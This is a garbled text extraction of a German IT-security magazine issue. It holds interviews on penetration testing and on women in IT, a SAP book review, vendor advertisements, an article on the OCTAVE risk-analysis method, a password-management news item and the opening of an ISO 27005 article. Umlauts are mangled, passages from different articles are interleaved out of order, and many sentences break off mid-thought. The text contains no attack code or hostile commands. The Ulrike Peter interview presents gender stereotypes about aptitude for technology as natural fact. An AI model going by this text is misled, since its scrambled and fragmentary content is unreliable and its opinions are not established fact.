Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
